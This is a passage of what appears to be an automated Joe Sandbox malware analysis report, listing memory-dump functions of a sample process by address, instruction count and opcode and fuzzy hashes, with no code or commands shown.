                                      • Instruction Fuzzy Hash: DC3104D2D4D69B86FA257E78D9110BA6E80BF04324F188A7ACB8D420E6CD0C784553D2
                                      Function 00007FFB4B207CCA Relevance: .3, Instructions: 290COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24f6f3ee905ca5f07990f32e3998c3fd526d56207b9bbaa58eda63aec29ea80e
                                      • Instruction ID: e1d1f4bfe8e959cfce82a187eaaa5f9fc9b280c669d02cf270bd5140779229d7
                                      • Opcode Fuzzy Hash: 24f6f3ee905ca5f07990f32e3998c3fd526d56207b9bbaa58eda63aec29ea80e
                                      • Instruction Fuzzy Hash: D7A106B050DA468FDB4AFF38C5945A4BBA1FF15300F5481B9C64EC7AA7CB28B851C791
                                      Function 00007FFB4B202C7A Relevance: .3, Instructions: 283COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 50beaee329dfde7bfbf7689ac1a79431fce0654393cf1280ee282032bc5c225d
                                      • Instruction ID: 22ea19742b201efade77d5acba1b3d4f33ecd504a61d1a4cfbdf67ae8e66eb1b
                                      • Opcode Fuzzy Hash: 50beaee329dfde7bfbf7689ac1a79431fce0654393cf1280ee282032bc5c225d
                                      • Instruction Fuzzy Hash: 22A1F5B050CA468FDF49FF28C1946A4BBA1FF55300F5481BAC64EC7A96DB28B852C791
                                      Function 00007FFB4B20D786 Relevance: .3, Instructions: 270COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88e4e452d58edb511b3f7ae11bfebe2ca4b9e4aa05c9bf62f2bc3986573222d0
                                      • Instruction ID: e8b37e8eda94f2495e9d69e20d760bb148a3de6ee52a81782c2dd9dc5e2ded18
                                      • Opcode Fuzzy Hash: 88e4e452d58edb511b3f7ae11bfebe2ca4b9e4aa05c9bf62f2bc3986573222d0
                                      • Instruction Fuzzy Hash: 9C817DB190EA068FE7397E38D5411B57BE1EF45350B14857EDA8EC31A2DE28B8039791
                                      Function 00007FFB4B2071A6 Relevance: .3, Instructions: 269COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1aeefce6f705d68f101ea52631f7edc2451517ad94a1871325127a80260ea99f
                                      • Instruction ID: 221c3f311203dbab1682a6a06c96d3ff2c4dd506c0f17526fe71a30d745695ba
                                      • Opcode Fuzzy Hash: 1aeefce6f705d68f101ea52631f7edc2451517ad94a1871325127a80260ea99f
                                      • Instruction Fuzzy Hash: 79810AB1A0CA468FFB65BF38D5451B57BE1FF85310B14457ED68EC31B2DA2878024792
                                      Function 00007FFB4B202156 Relevance: .3, Instructions: 262COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2b6410f1689aa9b4e0e03b39c34d2ac19a71e2059bdf035a18da058e1f41a8
                                      • Instruction ID: e35eda85faeb5fe3e844b2241f27c72d2546d944a14b93b9d581679adc23b1bc
                                      • Opcode Fuzzy Hash: fd2b6410f1689aa9b4e0e03b39c34d2ac19a71e2059bdf035a18da058e1f41a8
                                      • Instruction Fuzzy Hash: 958127B190CA428FEF69BF78D5455B5BBE1EF41310B14817FD78A831A3DE28B8028752
                                      Function 00007FFB4B2002B9 Relevance: .3, Instructions: 252COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 266308c12c41989c5518a65752ba83a78b5142014ecadb4acb26c27debbda384
                                      • Instruction ID: 5e0398e341ff37be6789b50f8249b9b70f14fca056dd6355026e7b31200aad12
                                      • Opcode Fuzzy Hash: 266308c12c41989c5518a65752ba83a78b5142014ecadb4acb26c27debbda384
                                      • Instruction Fuzzy Hash: D17148B050C54E4FFB69FF38C5565BA7BC0EF45318B0442B9D79EC75B2DA18A8068386
                                      Function 00007FFB4B20C48B Relevance: .2, Instructions: 243COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd31ab811cf299fe55f3f9e0e754ced2f6617227e0b921810b17ef444a37e393
                                      • Instruction ID: 68de9e4a30b75be06f5d574bd7017f5a22b312d8c86d58425dfc298db007ad3f
                                      • Opcode Fuzzy Hash: bd31ab811cf299fe55f3f9e0e754ced2f6617227e0b921810b17ef444a37e393
                                      • Instruction Fuzzy Hash: 2681AFF0D2EA4E9EEB65FF74C9546BCBFA1FF49300F1041BAD20AD31A1DA2868419750
                                      Function 00007FFB4B205EAB Relevance: .2, Instructions: 243COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a018555a4a4f01912db19069741389cbbbc05114f2b84ae12bb4b44e45d041e9
                                      • Instruction ID: b56c85579d4910163b6e607a6ac7a5aa4d476891ec61643047aa9110285a92e1
                                      • Opcode Fuzzy Hash: a018555a4a4f01912db19069741389cbbbc05114f2b84ae12bb4b44e45d041e9
                                      • Instruction Fuzzy Hash: D481B0B0D1CA4F8FEB95FF74C9946BC7BA1FF56300F1081BAD60AD71A1DA2868428751
                                      Function 00007FFB4B200E7B Relevance: .2, Instructions: 238COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d13cdc65922829e6426a178bc07412bc7b13860e08897cdf336f08c19feefece
                                      • Instruction ID: fb7b41d076ff68bf64fd96c44e3db13810ff25d24bcf5a01e024bc31d220599b
                                      • Opcode Fuzzy Hash: d13cdc65922829e6426a178bc07412bc7b13860e08897cdf336f08c19feefece
                                      • Instruction Fuzzy Hash: 1581DFB091C64E8FEB55FE74C955ABE7BA1EF54304F1081BAD24ED31A2DE2868429740
                                      Function 00007FFB4B2052FD Relevance: .2, Instructions: 232COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 90ed508c3c9ac516649b0239579df8877c26135675c91d63d26865fc100855f9
                                      • Instruction ID: d5f4b3b6c8cab71d73e02b1837308c4673e50fca204cbe71961542472b302bb5
                                      • Opcode Fuzzy Hash: 90ed508c3c9ac516649b0239579df8877c26135675c91d63d26865fc100855f9
                                      • Instruction Fuzzy Hash: D36115B150C54B4FEB68FE38C99A5F87BD0FF46311B1442B9D39EC75B2DA18A8068742
                                      Function 00007FFB4B202C8E Relevance: .2, Instructions: 152COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a8c7d046bae7cfae3ee981416e41ddd18aa6a209807f7e869506d70a5248956
                                      • Instruction ID: b07c5da8ea3979630627b5403716548f0d326e8677226c70cebf7e13041db393
                                      • Opcode Fuzzy Hash: 1a8c7d046bae7cfae3ee981416e41ddd18aa6a209807f7e869506d70a5248956
                                      • Instruction Fuzzy Hash: 375196B061C9069BEF49FF28C1956A5B791FF58300F54C27AC60EC7A96DB38F8528790
                                      Function 00007FFB4B207CEE Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a1fd2bf2df80eed3c0ab31a6e9426f5ebd14ba5ea565eac16db4845ac6c3ae2f
                                      • Instruction ID: f6bed86e13c560fb4209c21976a026b014ae5ad269bfe3fc907641754f64b041
                                      • Opcode Fuzzy Hash: a1fd2bf2df80eed3c0ab31a6e9426f5ebd14ba5ea565eac16db4845ac6c3ae2f
                                      • Instruction Fuzzy Hash: 305192A0A0D9075BEB49FF38C1956A5BB91FF54300F548179C60EC7AA6CB28F8528781
                                      Function 00007FFB4B2049D7 Relevance: .1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0efdeab0f6ecb0716238d0cfad14cca33eb59372a38dafd3b00de01e8254b16b
                                      • Instruction ID: 0d3a919aecc7f29045b1d994462ddea004d4a3201db8b9be642a679551bcc234
                                      • Opcode Fuzzy Hash: 0efdeab0f6ecb0716238d0cfad14cca33eb59372a38dafd3b00de01e8254b16b
                                      • Instruction Fuzzy Hash: 0441957260CA098FDF98FF2CC4A5AA477E1FB68310B0441AAD14EC3692DE35EC55CB81
                                      Function 00007FFB4B209A27 Relevance: .1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a7fb9d855c4d0da317bc1f6605d5d75154e34a5e45a5e02d2a2713ecbbba7b2
                                      • Instruction ID: 3dc264cc8b2bab23f7306f55abb54cbf01b2ee538a1be5abda2772709c9daa59
                                      • Opcode Fuzzy Hash: 1a7fb9d855c4d0da317bc1f6605d5d75154e34a5e45a5e02d2a2713ecbbba7b2
                                      • Instruction Fuzzy Hash: CC41837160C9188FDF88FF28C499DA4B7E1FB6932471442A9D14EC3592CE35E855CB81
                                      Function 00007FFB4B20B556 Relevance: .1, Instructions: 122COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 038b6bdf5f37ef690a2d1418875abb175617c3b09aa627cc42f9671fac9cbf9f
                                      • Instruction ID: c76aaf40ace15f0119b78ed1ebeeed3fdc7b8ac1c03596d8605d936e029a006e
                                      • Opcode Fuzzy Hash: 038b6bdf5f37ef690a2d1418875abb175617c3b09aa627cc42f9671fac9cbf9f
                                      • Instruction Fuzzy Hash: 69316C7260CA4D4FDB61FF28D8155E97BE1EBD9320B0542BBD04DC7291DA2899468781
                                      Function 00007FFB4B204A81 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 728e81cce6145a8da841f4d3dec2f34e022e2899afdd8b2a09c0f443b6774399
                                      • Instruction ID: 896324f801ac92fab4add14d555198b64b7ebbf2c89a801d2afda8e41fbdb656
                                      • Opcode Fuzzy Hash: 728e81cce6145a8da841f4d3dec2f34e022e2899afdd8b2a09c0f443b6774399
                                      • Instruction Fuzzy Hash: EA31A07160CA498FDB9CFF28C4A9AA477E1FB6931070541AAD04EC76A2DE34E845CB81
                                      Function 00007FFB4B209AD1 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9029bbc322c5f7bb7b433c8f7d383db0cd21a05437a4c24dedfb570571c8bfd3
                                      • Instruction ID: ee32e198511e28d1c4b5e487dbae4551983abb2bab4744d2e3372bb68332fd6a
                                      • Opcode Fuzzy Hash: 9029bbc322c5f7bb7b433c8f7d383db0cd21a05437a4c24dedfb570571c8bfd3
                                      • Instruction Fuzzy Hash: 1431D17160CA588FDB88FF2CC499DA4B7E1FB7932470842ADD14AC7592CE38E845CB81
                                      Function 00007FFB4AE10908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Function 00007FFB4B204A1B Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 29a9cfea78ccc781887e2d8673eaf25bc09534e3ffd3e98cd5eb9e3d00d972df
                                      • Instruction ID: 7bde3648a07d7109769e35a5ae39b93ed356b157858c41db5b9d479d05d64a6e
                                      • Opcode Fuzzy Hash: 29a9cfea78ccc781887e2d8673eaf25bc09534e3ffd3e98cd5eb9e3d00d972df
                                      • Instruction Fuzzy Hash: 3B31847160CA098FDF58FF28C4A5AA477E1FB6831070541AAD14EC7692DE34E855CB81
                                      Function 00007FFB4B209A6B Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ac0667d81a8b36c3eb90026aabc5377da4893e4dca856349d34f42a8ff9673f
                                      • Instruction ID: 0a34c9a125aa95a7b7da8827c16ead6fb2e3e3354eead79214bdbbd1ccbc42bf
                                      • Opcode Fuzzy Hash: 5ac0667d81a8b36c3eb90026aabc5377da4893e4dca856349d34f42a8ff9673f
                                      • Instruction Fuzzy Hash: E731BF7160CA198FDB88FF28C499DA4B7E2FB7931471442A9D14AC3692CE38E845CB81
                                      Function 00007FFB4B206B5F Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b937508c92e4af140948761cf703984682c859d203bcefb3cddc2e92b0818a83
                                      • Instruction ID: 4e6b10e65c8babc416a7853a322877937cb4515da73fb61dc6082feac2dbef19
                                      • Opcode Fuzzy Hash: b937508c92e4af140948761cf703984682c859d203bcefb3cddc2e92b0818a83
                                      • Instruction Fuzzy Hash: 6231F871A0CA4A8FDB55FF6CC9929A8FBE1FF4531071442B9D059D7286DF24B812C781
                                      Function 00007FFB4B2047E5 Relevance: .1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b5f1780b8e12436b7ba6eddb956906f259c5629a658479b17543a64f4f064a62
                                      • Instruction ID: e6dd4dfd1080da0042cb32eec0c911b5167725dd028270823a72b54a7b91af11
                                      • Opcode Fuzzy Hash: b5f1780b8e12436b7ba6eddb956906f259c5629a658479b17543a64f4f064a62
                                      • Instruction Fuzzy Hash: 9A3139B090C98ACFEF98FF68C9555BD7BB1FF44300F50887AD62DD25A2DA28A9009741
                                      Function 00007FFB4B209835 Relevance: .1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f0f2c6c7ec1b6ab6a15a2344ab76fc00aa22aef561ea06d15a7f03a84cb0b42
                                      • Instruction ID: b73b916fba8c46fcd8b4d5a2a0bfe6584909d120eb76590350e7e8454526022d
                                      • Opcode Fuzzy Hash: 4f0f2c6c7ec1b6ab6a15a2344ab76fc00aa22aef561ea06d15a7f03a84cb0b42
                                      • Instruction Fuzzy Hash: 5F3138B090C91E8FEF98FF68C5955BD7BA1FF64300F1484BAD31BD62A1DA39A8009741
                                      Function 00007FFB4AE1116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2568989ed48abf69765b85e60d9b50b314657c8e8892b23d53f65a7e824761de
                                      • Instruction ID: 863b120950af5d32a6b563c9a21f52cb0d6b061b91ae2a86bc94618b33ee843d
                                      • Opcode Fuzzy Hash: 2568989ed48abf69765b85e60d9b50b314657c8e8892b23d53f65a7e824761de
                                      • Instruction Fuzzy Hash: E731AF71A0D65A8FDB45FF78C8589B97BE0FF59310B2445FAC01AC72A3DB29A441CB40
                                      Function 00007FFB4B2036D1 Relevance: .1, Instructions: 91COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ec291f7f8292214cdf536fcbd072d5e5ed38d10572cd1d97872689f3188ec4b4
                                      • Instruction ID: a5e80eedbdf70ce45a7ff55b66f8d1354f823abdee6bcc7e0ff6a8dff1d3d488
                                      • Opcode Fuzzy Hash: ec291f7f8292214cdf536fcbd072d5e5ed38d10572cd1d97872689f3188ec4b4
                                      • Instruction Fuzzy Hash: 61315E9081C5974BEB2ABE28D5645B57F71EF46310718C6BAD3CACB4F7C81CB8458381
                                      Function 00007FFB4B206C68 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565d2ab2bb8b017bb2f658cb0769d79fcd99d6cb7f294b18d0b7ebeeff25c785
                                      • Instruction ID: 115f279223f91c719059dec7da9d6a3a90c4340e6e2b70ecdf921ceb9a7f0bd0
                                      • Opcode Fuzzy Hash: 565d2ab2bb8b017bb2f658cb0769d79fcd99d6cb7f294b18d0b7ebeeff25c785
                                      • Instruction Fuzzy Hash: 7D214BA1A0C6494FEB56FE78D9552A8BBA1FF45310F1442B9D24ED32D3D918A9068381
                                      Function 00007FFB4B20ECF0 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3957261f1454e82100658a2e5d3a5be438545f0b78ce6cd81428b6a9dedcf2da
                                      • Instruction ID: b79256a0b60422ee46ea66ec5b7dab8c39a4f224122ecd95a612f26ed02b027e
                                      • Opcode Fuzzy Hash: 3957261f1454e82100658a2e5d3a5be438545f0b78ce6cd81428b6a9dedcf2da
                                      • Instruction Fuzzy Hash: 96313A50C1C59A4BEB5ABF3489645747FA5EF52301B19CAFAC29E8A4E7C42CA8C1C341
                                      Function 00007FFB4B208721 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e55997339256cef260dfb8493a7c9ff3d90855dafeafdf464b7c2354bbfb981a
                                      • Instruction ID: 86e895b1cede2c8a406e32a39483809e220c83a5cf040eda16050cbc024e13a5
                                      • Opcode Fuzzy Hash: e55997339256cef260dfb8493a7c9ff3d90855dafeafdf464b7c2354bbfb981a
                                      • Instruction Fuzzy Hash: BA31895082C5AA4FEB6ABE24C9645757F61EF81301718C7FAC6868F4EBC82CB881C741
                                      Function 00007FFB4B200AF2 Relevance: .1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dac02594e07199d6d7d6b699543d2c52d530d0d53200576933abff3e3b1037b8
                                      • Instruction ID: c323ef1d2eb616497730a3d43b33438202fcaf0590a34f20a16e0b3dfa24b016
                                      • Opcode Fuzzy Hash: dac02594e07199d6d7d6b699543d2c52d530d0d53200576933abff3e3b1037b8
                                      • Instruction Fuzzy Hash: F1211A70A1891D8FDF98EF68C4A5AEDB7B1FB58304F1041AAD14EE3295CB34A941CB40
                                      Function 00007FFB4B20CBE3 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe5b6f8222188c631647cb3c15b006f725b428ad074020abe409112809a5e8c0
                                      • Instruction ID: b2cfa1029559034c79efb0abac158932cdf48e201d17898dd010810550d1eee8
                                      • Opcode Fuzzy Hash: fe5b6f8222188c631647cb3c15b006f725b428ad074020abe409112809a5e8c0
                                      • Instruction Fuzzy Hash: B121B6B1A1D6098FDBA8FF28C85557977E1FF49315B40417ED24EC75A1CB24AC428B40
                                      Function 00007FFB4B20C102 Relevance: .1, Instructions: 82COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f58cbf4e712f8009726ae9cda095f9e40af55aeb418c9f0a72350a704f1f4b5f
